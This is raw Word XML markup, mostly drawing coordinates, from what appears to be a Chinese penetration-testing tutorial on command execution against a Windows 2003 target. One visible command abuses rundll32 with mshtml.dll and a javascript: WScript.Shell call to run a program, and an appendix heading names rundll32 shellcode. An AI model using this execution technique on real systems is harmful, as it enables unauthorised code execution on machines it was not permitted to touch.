6705,10484,6716,10484,6727,10484,6738,10484,6749,10484,6761,10484,6773,10484,6785,10484,6797,10484,6810,10484,6823,10484,6836,10484,6850,10484,6863,10484,6877,10484,6891,10484,6906,10484,6920,10484,6935,10484,6950,10484,6966,10484,6982,10484,6998,10484,7014,10484,7031,10484,7048,10484,7048,10484,7048,10484,7048,10484,7048,10484,7048,10484,7048,10483,7048,10482,7048,10482,7048,10480,7048,10479,7048,10477,7048,10475,7048,10473,7048,10470,7048,10466,7048,10462,7048,10458,7048,10453,7048,10448,7048,10442,7048,10435,7048,10428,7048,10419,7048,10411,7048,10401,7048,10391,7048,10379,7048,10367,7048,10354,7048,10340,7048,10326,7048,10310,7048,10293,7048,10275,7048,10256,7048,10236,7048,10215,7048,10192,7048,10168,7048,10143,7048,10117,7048,10090,7048,10061,7048,10031,7048,9999,7048,9966,7048,9931,7048,9895,7048,9858,7048,9819,7048,9778,7048,9735,7048,9691,7048,9646,7048,9598,7048,9549,7048,9498,7048,9445,7048,9391,7048,9334,7048,9275,7048,9215,7048,9153,7048,9088,7048,9022,7048,8953,7048,8883,7048,8810,7048,8735,7048,8658,7048,8578,7048,8497,7048,8413,7048,8326,7048,8238,7048,8146,7048,8053,7048,7957,7048,7859,7048,7758,7048,7654,7048,7548,7048,7439,7048,7328,7048,7214,7048,7097,7048,6977,7048,6855,7048,6730,7048,6602,7048,6471,7048,6337,7048,6201,7048,6061,7048,5918,7048,5773,7048,5624,7048,5472,7048,5317,7048,5159,7048,4997,7048,4833,7048,4665,7048,4494,7048,4319,7048,4141,7048,3960,7048,3776,7048,3587,7048,3396,7048,3201,7048,3002,7048,2800,7048,2594,7048,2385,7048,2172,7048,1955,7048,1734,7048,1510,7048,1510,7048,1510,7048,1510,7048,1510,7048,1510,7048,1510,7047,1510,7047,1510,7047,1510,7047,1510,7047,1510,7047,1510,7047,1510,7047,1510,7047,1510,7046,1510,7046,1510,7046,1510,7046,1510,7045,1510,7045,1510,7044,1510,7044,1510,7043,1510,7043,1510,7042,1510,7041,1510,7041,1510,7040,1510,7039,1510,7038,1510,7037,1510,7036,1510,7034,1510,7033,1510,7032,1510,7030,1510,7029,1510,7027,1510,7026,1510,7024,1510,7022,1510,7020,1510,7018,1510,7016,1510,7013,1510,7011,1510,7009,1510,7006,1510,7003,1510,7000,1510,6997,1510,6994,1510,6991,1510,6988,1510,6984,1510,6981,1510,6977,1510,6973,1510,6969,1510,6965,1510,6961,1510,6957,1510,6952,1510,6947,1510,6942,1510,6937,1510,6932,1510,6927,1510,6922,1510,6916,1510,6910,1510,6904,1510,6898,1510,6892,1510,6885,1510,6878,1510,6872,1510,6865,1510,6857,1510,6850,1510,6842,1510,6835,1510,6827,1510,6818,1510,6810,1510,6801,1510,6793,1510,6784,1510,6774,1510,6765,1510,6755,1510,6746,1510,6735,1510,6725,1510,6715,1510,6704,1510,6693,1510,6682,1510,6670,1510,6659,1510,6647,1510,6635,1510,6622,1510,6610,1510,6597,1510,6584,1510,6570,1510,6557,1510,6543,1510,6529,1510,6514,1510,6499,1510,6485,1510,6469,1510,6454,1510,6438,1510,6422,1510,6406,1510,6389,1510,6372e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:318.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6370" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:6370;width:8990;height:10" coordorigin="1490,6370" coordsize="8990,10" path="m1510,6380l1510,6380,1510,6380,1510,6380,1510,6380,1510,6380,1510,6380,1511,6380,1512,6380,1512,6380,1514,6380,1515,6380,1517,6380,1519,6380,1521,6380,1524,6380,1528,6380,1532,6380,1536,6380,1541,6380,1546,6380,1552,6380,1559,6380,1566,6380,1575,6380,1583,6380,1593,6380,1603,6380,1615,6380,1627,6380,1640,6380,1654,6380,1668,6380,1684,6380,1701,6380,1719,6380,1738,6380,1758,6380,1780,6380,1802,6380,1826,6380,1851,6380,1877,6380,1904,6380,1933,6380,1963,6380,1995,6380,2028,6380,2063,6380,2099,6380,2136,6380,2175,6380,2216,6380,2259,6380,2303,6380,2348,6380,2396,6380,2445,6380,2496,6380,2549,6380,2604,6380,2660,6380,2719,6380,2779,6380,2841,6380,2906,6380,2972,6380,3041,6380,3112,6380,3184,6380,3259,6380,3336,6380,3416,6380,3498,6380,3582,6380,3668,6380,3757,6380,3848,6380,3941,6380,4037,6380,4136,6380,4236,6380,4340,6380,4446,6380,4555,6380,4666,6380,4780,6380,4897,6380,5017,6380,5139,6380,5264,6380,5392,6380,5523,6380,5657,6380,5793,6380,5933,6380,6076,6380,6222,6380,6370,6380,6522,6380,6677,6380,6835,6380,6997,6380,7161,6380,7329,6380,7500,6380,7675,6380,7853,6380,8034,6380,8219,6380,8407,6380,8598,6380,8793,6380,8992,6380,9194,6380,9400,6380,9609,6380,9823,6380,10039,6380,10260,6380,10484,6380e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:351.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7030" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:7030;width:8990;height:10" coordorigin="1490,7030" coordsize="8990,10" path="m1510,7040l1510,7040,1510,7040,1510,7040,1510,7040,1510,7040,1510,7040,1511,7040,1512,7040,1512,7040,1514,7040,1515,7040,1517,7040,1519,7040,1521,7040,1524,7040,1528,7040,1532,7040,1536,7040,1541,7040,1546,7040,1552,7040,1559,7040,1566,7040,1575,7040,1583,7040,1593,7040,1603,7040,1615,7040,1627,7040,1640,7040,1654,7040,1668,7040,1684,7040,1701,7040,1719,7040,1738,7040,1758,7040,1780,7040,1802,7040,1826,7040,1851,7040,1877,7040,1904,7040,1933,7040,1963,7040,1995,7040,2028,7040,2063,7040,2099,7040,2136,7040,2175,7040,2216,7040,2259,7040,2303,7040,2348,7040,2396,7040,2445,7040,2496,7040,2549,7040,2604,7040,2660,7040,2719,7040,2779,7040,2841,7040,2906,7040,2972,7040,3041,7040,3112,7040,3184,7040,3259,7040,3336,7040,3416,7040,3498,7040,3582,7040,3668,7040,3757,7040,3848,7040,3941,7040,4037,7040,4136,7040,4236,7040,4340,7040,4446,7040,4555,7040,4666,7040,4780,7040,4897,7040,5017,7040,5139,7040,5264,7040,5392,7040,5523,7040,5657,7040,5793,7040,5933,7040,6076,7040,6222,7040,6370,7040,6522,7040,6677,7040,6835,7040,6997,7040,7161,7040,7329,7040,7500,7040,7675,7040,7853,7040,8034,7040,8219,7040,8407,7040,8598,7040,8793,7040,8992,7040,9194,7040,9400,7040,9609,7040,9823,7040,10039,7040,10260,7040,10484,7040e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:317.399pt;width:445.800pt;height:34.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId19" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:747.101pt;width:0.0pt;height:94.898pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,14942" coordsize="0,1897">
        <v:shape style="position:absolute;left:10402;top:14942;width:0;height:1897" coordorigin="10402,14942" coordsize="0,1897" path="m10402,14942l10402,14942,10402,14942,10402,14942,10402,14942,10402,14942,10402,14942,10402,14942,10402,14942,10402,14942,10402,14942,10402,14943,10402,14943,10402,14943,10402,14944,10402,14945,10402,14945,10402,14946,10402,14947,10402,14948,10402,14949,10402,14951,10402,14952,10402,14954,10402,14955,10402,14957,10402,14959,10402,14961,10402,14964,10402,14966,10402,14969,10402,14972,10402,14975,10402,14978,10402,14982,10402,14986,10402,14990,10402,14994,10402,14999,10402,15003,10402,15008,10402,15014,10402,15019,10402,15025,10402,15031,10402,15037,10402,15044,10402,15051,10402,15058,10402,15066,10402,15074,10402,15082,10402,15091,10402,15100,10402,15109,10402,15119,10402,15129,10402,15139,10402,15150,10402,15161,10402,15173,10402,15185,10402,15197,10402,15210,10402,15223,10402,15237,10402,15251,10402,15265,10402,15280,10402,15296,10402,15312,10402,15328,10402,15345,10402,15362,10402,15380,10402,15398,10402,15417,10402,15436,10402,15456,10402,15476,10402,15497,10402,15518,10402,15540,10402,15563,10402,15586,10402,15609,10402,15633,10402,15658,10402,15683,10402,15709,10402,15736,10402,15763,10402,15790,10402,15819,10402,15847,10402,15877,10402,15907,10402,15938,10402,15969,10402,16002,10402,16034,10402,16068,10402,16102,10402,16137,10402,16172,10402,16208,10402,16245,10402,16283,10402,16321,10402,16360,10402,16400,10402,16441,10402,16482,10402,16524,10402,16567,10402,16610,10402,16654,10402,16700,10402,16745,10402,16792,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:746.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14930" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:14930;width:8990;height:370" coordorigin="1490,14930" coordsize="8990,370" path="m1510,14942l1510,14942,1510,14942,1510,14942,1510,14942,1510,14942,1510,14942,1511,14942,1512,14942,1512,14942,1514,14942,1515,14942,1517,14942,1519,14942,1521,14942,1524,14942,1528,14942,1532,14942,1536,14942,1541,14942,1546,14942,1552,14942,1559,14942,1566,14942,1575,14942,1583,14942,1593,14942,1603,14942,1615,14942,1627,14942,1640,14942,1654,14942,1668,14942,1684,14942,1701,14942,1719,14942,1738,14942,1758,14942,1780,14942,1802,14942,1826,14942,1851,14942,1877,14942,1904,14942,1933,14942,1963,14942,1995,14942,2028,14942,2063,14942,2099,14942,2136,14942,2175,14942,2216,14942,2259,14942,2303,14942,2348,14942,2396,14942,2445,14942,2496,14942,2549,14942,2604,14942,2660,14942,2719,14942,2779,14942,2841,14942,2906,14942,2972,14942,3041,14942,3112,14942,3184,14942,3259,14942,3336,14942,3416,14942,3498,14942,3582,14942,3668,14942,3757,14942,3848,14942,3941,14942,4037,14942,4136,14942,4236,14942,4340,14942,4446,14942,4555,14942,4666,14942,4780,14942,4897,14942,5017,14942,5139,14942,5264,14942,5392,14942,5523,14942,5657,14942,5793,14942,5933,14942,6076,14942,6222,14942,6370,14942,6522,14942,6677,14942,6835,14942,6997,14942,7161,14942,7329,14942,7500,14942,7675,14942,7853,14942,8034,14942,8219,14942,8407,14942,8598,14942,8793,14942,8992,14942,9194,14942,9400,14942,9609,14942,9823,14942,10039,14942,10260,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14942,10484,14943,10484,14943,10484,14943,10484,14943,10484,14944,10484,14944,10484,14944,10484,14945,10484,14945,10484,14945,10484,14946,10484,14946,10484,14947,10484,14948,10484,14948,10484,14949,10484,14950,10484,14950,10484,14951,10484,14952,10484,14953,10484,14954,10484,14955,10484,14956,10484,14957,10484,14958,10484,14959,10484,14960,10484,14962,10484,14963,10484,14965,10484,14966,10484,14968,10484,14969,10484,14971,10484,14973,10484,14975,10484,14977,10484,14979,10484,14981,10484,14983,10484,14985,10484,14987,10484,14990,10484,14992,10484,14995,10484,14997,10484,15000,10484,15003,10484,15006,10484,15008,10484,15012,10484,15015,10484,15018,10484,15021,10484,15025,10484,15028,10484,15032,10484,15035,10484,15039,10484,15043,10484,15047,10484,15051,10484,15056,10484,15060,10484,15064,10484,15069,10484,15073,10484,15078,10484,15083,10484,15088,10484,15093,10484,15098,10484,15104,10484,15109,10484,15115,10484,15121,10484,15126,10484,15132,10484,15139,10484,15145,10484,15151,10484,15158,10484,15164,10484,15171,10484,15178,10484,15185,10484,15192,10484,15199,10484,15207,10484,15214,10484,15222,10484,15230,10484,15238,10484,15246,10484,15254,10484,15263,10484,15271,10484,15280,10484,15289,10484,15298,10484,15307,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10483,15317,10482,15317,10482,15317,10480,15317,10479,15317,10477,15317,10475,15317,10473,15317,10470,15317,10466,15317,10462,15317,10458,15317,10453,15317,10448,15317,10442,15317,10435,15317,10428,15317,10419,15317,10411,15317,10401,15317,10391,15317,10379,15317,10367,15317,10354,15317,10340,15317,10326,15317,10310,15317,10293,15317,10275,15317,10256,15317,10236,15317,10215,15317,10192,15317,10168,15317,10143,15317,10117,15317,10090,15317,10061,15317,10031,15317,9999,15317,9966,15317,9931,15317,9895,15317,9858,15317,9819,15317,9778,15317,9735,15317,9691,15317,9646,15317,9598,15317,9549,15317,9498,15317,9445,15317,9391,15317,9334,15317,9275,15317,9215,15317,9153,15317,9088,15317,9022,15317,8953,15317,8883,15317,8810,15317,8735,15317,8658,15317,8578,15317,8497,15317,8413,15317,8326,15317,8238,15317,8146,15317,8053,15317,7957,15317,7859,15317,7758,15317,7654,15317,7548,15317,7439,15317,7328,15317,7214,15317,7097,15317,6977,15317,6855,15317,6730,15317,6602,15317,6471,15317,6337,15317,6201,15317,6061,15317,5918,15317,5773,15317,5624,15317,5472,15317,5317,15317,5159,15317,4997,15317,4833,15317,4665,15317,4494,15317,4319,15317,4141,15317,3960,15317,3776,15317,3587,15317,3396,15317,3201,15317,3002,15317,2800,15317,2594,15317,2385,15317,2172,15317,1955,15317,1734,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15316,1510,15316,1510,15316,1510,15316,1510,15316,1510,15316,1510,15316,1510,15316,1510,15315,1510,15315,1510,15315,1510,15315,1510,15314,1510,15314,1510,15314,1510,15313,1510,15313,1510,15312,1510,15312,1510,15311,1510,15311,1510,15310,1510,15309,1510,15309,1510,15308,1510,15307,1510,15306,1510,15305,1510,15305,1510,15304,1510,15302,1510,15301,1510,15300,1510,15299,1510,15298,1510,15296,1510,15295,1510,15294,1510,15292,1510,15291,1510,15289,1510,15287,1510,15285,1510,15284,1510,15282,1510,15280,1510,15278,1510,15275,1510,15273,1510,15271,1510,15269,1510,15266,1510,15264,1510,15261,1510,15258,1510,15256,1510,15253,1510,15250,1510,15247,1510,15244,1510,15240,1510,15237,1510,15234,1510,15230,1510,15226,1510,15223,1510,15219,1510,15215,1510,15211,1510,15207,1510,15203,1510,15198,1510,15194,1510,15189,1510,15185,1510,15180,1510,15175,1510,15170,1510,15165,1510,15160,1510,15154,1510,15149,1510,15143,1510,15138,1510,15132,1510,15126,1510,15120,1510,15114,1510,15107,1510,15101,1510,15094,1510,15087,1510,15080,1510,15073,1510,15066,1510,15059,1510,15052,1510,15044,1510,15036,1510,15028,1510,15020,1510,15012,1510,15004,1510,14995,1510,14987,1510,14978,1510,14969,1510,14960,1510,14951,1510,14942e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:746.400pt;width:445.800pt;height:19.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId20" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:764.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15290" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:15290;width:8990;height:370" coordorigin="1490,15290" coordsize="8990,370" path="m1510,15317l1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1511,15317,1512,15317,1512,15317,1514,15317,1515,15317,1517,15317,1519,15317,1521,15317,1524,15317,1528,15317,1532,15317,1536,15317,1541,15317,1546,15317,1552,15317,1559,15317,1566,15317,1575,15317,1583,15317,1593,15317,1603,15317,1615,15317,1627,15317,1640,15317,1654,15317,1668,15317,1684,15317,1701,15317,1719,15317,1738,15317,1758,15317,1780,15317,1802,15317,1826,15317,1851,15317,1877,15317,1904,15317,1933,15317,1963,15317,1995,15317,2028,15317,2063,15317,2099,15317,2136,15317,2175,15317,2216,15317,2259,15317,2303,15317,2348,15317,2396,15317,2445,15317,2496,15317,2549,15317,2604,15317,2660,15317,2719,15317,2779,15317,2841,15317,2906,15317,2972,15317,3041,15317,3112,15317,3184,15317,3259,15317,3336,15317,3416,15317,3498,15317,3582,15317,3668,15317,3757,15317,3848,15317,3941,15317,4037,15317,4136,15317,4236,15317,4340,15317,4446,15317,4555,15317,4666,15317,4780,15317,4897,15317,5017,15317,5139,15317,5264,15317,5392,15317,5523,15317,5657,15317,5793,15317,5933,15317,6076,15317,6222,15317,6370,15317,6522,15317,6677,15317,6835,15317,6997,15317,7161,15317,7329,15317,7500,15317,7675,15317,7853,15317,8034,15317,8219,15317,8407,15317,8598,15317,8793,15317,8992,15317,9194,15317,9400,15317,9609,15317,9823,15317,10039,15317,10260,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15318,10484,15318,10484,15318,10484,15318,10484,15318,10484,15319,10484,15319,10484,15319,10484,15320,10484,15320,10484,15320,10484,15321,10484,15321,10484,15322,10484,15322,10484,15323,10484,15323,10484,15324,10484,15325,10484,15325,10484,15326,10484,15327,10484,15328,10484,15329,10484,15330,10484,15331,10484,15332,10484,15333,10484,15334,10484,15335,10484,15337,10484,15338,10484,15339,10484,15341,10484,15342,10484,15344,10484,15346,10484,15347,10484,15349,10484,15351,10484,15353,10484,15355,10484,15357,10484,15359,10484,15361,10484,15363,10484,15366,10484,15368,10484,15370,10484,15373,10484,15376,10484,15378,10484,15381,10484,15384,10484,15387,10484,15390,10484,15393,10484,15396,10484,15400,10484,15403,10484,15407,10484,15410,10484,15414,10484,15418,10484,15422,10484,15426,10484,15430,10484,15434,10484,15438,10484,15443,10484,15447,10484,15452,10484,15456,10484,15461,10484,15466,10484,15471,10484,15476,10484,15481,10484,15487,10484,15492,10484,15498,10484,15504,10484,15510,10484,15515,10484,15522,10484,15528,10484,15534,10484,15541,10484,15547,10484,15554,10484,15561,10484,15568,10484,15575,10484,15582,10484,15589,10484,15597,10484,15604,10484,15612,10484,15620,10484,15628,10484,15636,10484,15645,10484,15653,10484,15662,10484,15662,10484,15662,10484,15662,10484,15662,10484,15662,10484,15662,10483,15662,10482,15662,10482,15662,10480,15662,10479,15662,10477,15662,10475,15662,10473,15662,10470,15662,10466,15662,10462,15662,10458,15662,10453,15662,10448,15662,10442,15662,10435,15662,10428,15662,10419,15662,10411,15662,10401,15662,10391,15662,10379,15662,10367,15662,10354,15662,10340,15662,10326,15662,10310,15662,10293,15662,10275,15662,10256,15662,10236,15662,10215,15662,10192,15662,10168,15662,10143,15662,10117,15662,10090,15662,10061,15662,10031,15662,9999,15662,9966,15662,9931,15662,9895,15662,9858,15662,9819,15662,9778,15662,9735,15662,9691,15662,9646,15662,9598,15662,9549,15662,9498,15662,9445,15662,9391,15662,9334,15662,9275,15662,9215,15662,9153,15662,9088,15662,9022,15662,8953,15662,8883,15662,8810,15662,8735,15662,8658,15662,8578,15662,8497,15662,8413,15662,8326,15662,8238,15662,8146,15662,8053,15662,7957,15662,7859,15662,7758,15662,7654,15662,7548,15662,7439,15662,7328,15662,7214,15662,7097,15662,6977,15662,6855,15662,6730,15662,6602,15662,6471,15662,6337,15662,6201,15662,6061,15662,5918,15662,5773,15662,5624,15662,5472,15662,5317,15662,5159,15662,4997,15662,4833,15662,4665,15662,4494,15662,4319,15662,4141,15662,3960,15662,3776,15662,3587,15662,3396,15662,3201,15662,3002,15662,2800,15662,2594,15662,2385,15662,2172,15662,1955,15662,1734,15662,1510,15662,1510,15662,1510,15662,1510,15662,1510,15662,1510,15662,1510,15662,1510,15662,1510,15662,1510,15662,1510,15662,1510,15662,1510,15662,1510,15662,1510,15661,1510,15661,1510,15661,1510,15661,1510,15661,1510,15661,1510,15660,1510,15660,1510,15660,1510,15660,1510,15659,1510,15659,1510,15659,1510,15658,1510,15658,1510,15657,1510,15657,1510,15656,1510,15656,1510,15655,1510,15655,1510,15654,1510,15653,1510,15652,1510,15652,1510,15651,1510,15650,1510,15649,1510,15648,1510,15647,1510,15646,1510,15644,1510,15643,1510,15642,1510,15641,1510,15639,1510,15638,1510,15636,1510,15635,1510,15633,1510,15631,1510,15630,1510,15628,1510,15626,1510,15624,1510,15622,1510,15620,1510,15618,1510,15615,1510,15613,1510,15611,1510,15608,1510,15606,1510,15603,1510,15600,1510,15597,1510,15595,1510,15592,1510,15589,1510,15585,1510,15582,1510,15579,1510,15575,1510,15572,1510,15568,1510,15565,1510,15561,1510,15557,1510,15553,1510,15549,1510,15545,1510,15540,1510,15536,1510,15532,1510,15527,1510,15522,1510,15517,1510,15513,1510,15508,1510,15502,1510,15497,1510,15492,1510,15486,1510,15481,1510,15475,1510,15469,1510,15463,1510,15457,1510,15451,1510,15445,1510,15438,1510,15431,1510,15425,1510,15418,1510,15411,1510,15404,1510,15397,1510,15389,1510,15382,1510,15374,1510,15366,1510,15358,1510,15350,1510,15342,1510,15334,1510,15325,1510,15317e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:765.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15310" coordsize="30,350">
        <v:shape style="position:absolute;left:1490;top:15310;width:30;height:350" coordorigin="1490,15310" coordsize="30,350" path="m1517,15317l1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15318,1517,15318,1517,15318,1517,15318,1517,15318,1517,15319,1517,15319,1517,15319,1517,15320,1517,15320,1517,15320,1517,15321,1517,15321,1517,15322,1517,15322,1517,15323,1517,15323,1517,15324,1517,15325,1517,15325,1517,15326,1517,15327,1517,15328,1517,15329,1517,15330,1517,15331,1517,15332,1517,15333,1517,15334,1517,15335,1517,15337,1517,15338,1517,15339,1517,15341,1517,15342,1517,15344,1517,15346,1517,15347,1517,15349,1517,15351,1517,15353,1517,15355,1517,15357,1517,15359,1517,15361,1517,15363,1517,15366,1517,15368,1517,15370,1517,15373,1517,15376,1517,15378,1517,15381,1517,15384,1517,15387,1517,15390,1517,15393,1517,15396,1517,15400,1517,15403,1517,15407,1517,15410,1517,15414,1517,15418,1517,15422,1517,15426,1517,15430,1517,15434,1517,15438,1517,15443,1517,15447,1517,15452,1517,15456,1517,15461,1517,15466,1517,15471,1517,15476,1517,15481,1517,15487,1517,15492,1517,15498,1517,15504,1517,15510,1517,15515,1517,15522,1517,15528,1517,15534,1517,15541,1517,15547,1517,15554,1517,15561,1517,15568,1517,15575,1517,15582,1517,15589,1517,15597,1517,15604,1517,15612,1517,15620,1517,15628,1517,15636,1517,15645,1517,15653,1517,15662e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:123.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId21" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:414.600pt;width:467.400pt;height:206.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>于命令执行（3）：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-52"/>
        </w:rPr>
        <w:t>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2003：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rundll32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javascript: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"\..\mshtml.dll,RunHTMLApplication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32"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"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eval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"w=n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ew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ActiveXObject(\"WScript.Shell\");w.run(\"mstsc\");window.close()"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3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200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="35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注：如靶机支持powershell，调用powersh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ell更贴合实战。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4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附录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：Rundll32_shellcode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31" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7312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?xml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version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"1.0"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?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5.727pt;width:0.0pt;height:836.272pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,114" coordsize="0,16725">
        <v:shape style="position:absolute;left:10402;top:114;width:0;height:16725" coordorigin="10402,114" coordsize="0,16725" path="m10402,114l10402,114,10402,114,10402,114,10402,114,10402,115,10402,115,10402,116,10402,117,10402,119,10402,121,10402,124,10402,127,10402,131,10402,136,10402,141,10402,148,10402,155,10402,163,10402,172,10402,182,10402,193,10402,206,10402,220,10402,235,10402,251,10402,269,10402,288,10402,309,10402,332,10402,356,10402,382,10402,410,10402,439,10402,471,10402,504,10402,540,10402,577,10402,617,10402,659,10402,703,10402,749,10402,798,10402,849,10402,903,10402,960,10402,1018,10402,1080,10402,1145,10402,1212,10402,1282,10402,1355,10402,1431,10402,1510,10402,1592,10402,1677,10402,1765,10402,1857,10402,1952,10402,2051,10402,2152,10402,2258,10402,2367,10402,2479,10402,2596,10402,2716,10402,2840,10402,2967,10402,3099,10402,3235,10402,3375,10402,3518,10402,3666,10402,3819,10402,3975,10402,4136,10402,4301,10402,4471,10402,4645,10402,4824,10402,5008,10402,5196,10402,5389,10402,5586,10402,5789,10402,5997,10402,6209,10402,6427,10402,6650,10402,6878,10402,7111,10402,7349,10402,7593,10402,7843,10402,8097,10402,8358,10402,8624,10402,8895,10402,9172,10402,9456,10402,9744,10402,10039,10402,10340,10402,10647,10402,10960,10402,11278,10402,11604,10402,11935,10402,12273,10402,12617,10402,12967,10402,13324,10402,13688,10402,14058,10402,14435,10402,14819,10402,15209,10402,15606,10402,16010,10402,16421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8.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1710" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1710;width:8990;height:370" coordorigin="1490,1710" coordsize="8990,37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7,10484,1738,10484,1738,10484,1738,10484,1739,10484,1739,10484,1740,10484,1740,10484,1741,10484,1742,10484,1742,10484,1743,10484,1744,10484,1744,10484,1745,10484,1746,10484,1747,10484,1748,10484,1749,10484,1750,10484,1751,10484,1752,10484,1754,10484,1755,10484,1756,10484,1758,10484,1759,10484,1760,10484,1762,10484,1764,10484,1765,10484,1767,10484,1769,10484,1771,10484,1773,10484,1775,10484,1777,10484,1779,10484,1781,10484,1784,10484,1786,10484,1789,10484,1791,10484,1794,10484,1796,10484,1799,10484,1802,10484,1805,10484,1808,10484,1811,10484,1815,10484,1818,10484,1821,10484,1825,10484,1828,10484,1832,10484,1836,10484,1840,10484,1844,10484,1848,10484,1852,10484,1856,10484,1861,10484,1865,10484,1870,10484,1874,10484,1879,10484,1884,10484,1889,10484,1894,10484,1900,10484,1905,10484,1910,10484,1916,10484,1922,10484,1928,10484,1934,10484,1940,10484,1946,10484,1952,10484,1959,10484,1965,10484,1972,10484,1979,10484,1986,10484,1993,10484,2000,10484,2008,10484,2015,10484,2023,10484,2030,10484,2038,10484,2046,10484,2055,10484,2063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8,1510,2077,1510,2077,1510,2076,1510,2076,1510,2076,1510,2075,1510,2075,1510,2074,1510,2073,1510,2073,1510,2072,1510,2071,1510,2070,1510,2070,1510,2069,1510,2068,1510,2067,1510,2066,1510,2065,1510,2064,1510,2063,1510,2061,1510,2060,1510,2059,1510,2057,1510,2056,1510,2054,1510,2053,1510,2051,1510,2050,1510,2048,1510,2046,1510,2044,1510,2042,1510,2040,1510,2038,1510,2036,1510,2034,1510,2031,1510,2029,1510,2026,1510,2024,1510,2021,1510,2018,1510,2016,1510,2013,1510,2010,1510,2007,1510,2004,1510